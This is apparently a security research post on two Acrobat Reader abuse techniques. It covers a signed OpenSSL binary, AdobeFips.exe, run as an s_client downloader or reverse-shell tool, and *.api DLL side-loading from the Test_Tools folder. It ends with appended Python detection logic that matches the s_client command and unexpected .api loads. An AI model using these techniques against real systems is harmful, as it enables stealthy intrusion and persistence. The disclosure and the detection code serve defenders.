AdobeFips – Adobe Reader Lolbin

Sometimes ‘research’ means browsing the folders of the installed ‘target’ and… just executing the programs present inside these directories to see what they do.

During this very engaging and fascinating activity I noticed that the program:

c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\OSSLLibs\AdobeFips.exe

produces a very familiar output:

Yup, it is the OpenSSL client signed by Adobe:

Verified:       Signed
Signing date:   10:59 2024-01-13
Publisher:      Adobe Inc.
Company:        The OpenSSL Project, https://www.openssl.org/
Description:    OpenSSL application
Product:        The OpenSSL Toolkit
Prod version:   3.0.10
File version:   3.0.10
MachineType:    32-bit

So, one can run, f.ex.:

AdobeFips.exe s_client -connect domain:port

to connect to the domain and download stuff (f.ex. via a GET request), plus use any other rich feature OpenSSL offers (download, encryption, reverse shell, etc.).

Beyond good ol’ Run key, Part 144

Acrobat Reader is very popular software, installed on millions of computers worldwide.

Today I noticed that any time the AcroRd32.exe program starts (tested with the latest version, 24.4), it checks the following folder:

c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Test_Tools\

looking for *.api files.

All these files are then loaded as DLLs.

The screenshot below shows what happens when the following 3 files are present in the aforementioned folder:

  • aaFEAT.api
  • Automation.api
  • malware.api

The first two are named like the two legitimate *.api files that Acrobat Reader expects to find in the Test_Tools folder. The last one is just a randomly (well, not really) named DLL, there to show that any *.api file dropped in that folder will be loaded and executed…
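As an added example (not code from the original post), here is hunting logic for both behaviours described above, the AdobeFips.exe OpenSSL client and the Test_Tools *.api side-loading, run over constructed Sysmon-style process-creation (Event ID 1) and image-load (Event ID 7) records. The field names follow Sysmon's schema and the baseline of expected *.api files (aaFEAT.api, Automation.api) comes from the post; treating every other *.api name in that folder as suspicious is an assumption.

```python
import re

# Constructed sample events (not real telemetry). EventID 1 = process creation,
# EventID 7 = image load; field names follow the Sysmon schema.
READER_DIR = r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": READER_DIR + r"\OSSLLibs\AdobeFips.exe",
     "CommandLine": "AdobeFips.exe s_client -connect example.invalid:443"},
    {"EventID": 1, "Image": READER_DIR + r"\OSSLLibs\AdobeFips.exe",
     "CommandLine": "AdobeFips.exe version"},
    {"EventID": 7, "Image": READER_DIR + r"\AcroRd32.exe",
     "ImageLoaded": READER_DIR + r"\plug_ins\Test_Tools\aaFEAT.api"},
    {"EventID": 7, "Image": READER_DIR + r"\AcroRd32.exe",
     "ImageLoaded": READER_DIR + r"\plug_ins\Test_Tools\malware.api"},
]

# The two *.api files the post says Acrobat Reader legitimately expects here
# (assumed complete baseline; compare against a clean install before relying on it).
EXPECTED_TEST_TOOLS_API = {"aafeat.api", "automation.api"}


def check_event(ev):
    """Return a finding label for a suspicious event, or None if it looks benign."""
    eid = ev["EventID"]
    image = ev.get("Image", "").lower()
    # Signed OpenSSL binary being driven as a TLS client: the LOLBin case above.
    if eid == 1 and image.endswith("\\adobefips.exe"):
        cmd = ev.get("CommandLine", "").lower()
        if re.search(r"\bs_client\b", cmd) and "-connect" in cmd:
            return "adobefips_openssl_client"
    # Reader loading a *.api from Test_Tools that is not one of the expected two.
    if eid == 7 and image.endswith("\\acrord32.exe"):
        loaded = ev.get("ImageLoaded", "").lower()
        folder, _, name = loaded.rpartition("\\")
        if (folder.endswith("\\plug_ins\\test_tools") and name.endswith(".api")
                and name not in EXPECTED_TEST_TOOLS_API):
            return "unexpected_test_tools_api:" + name
    return None


def scan(events):
    """Run check_event over a list of records and collect the findings in order."""
    return [f for f in (check_event(ev) for ev in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```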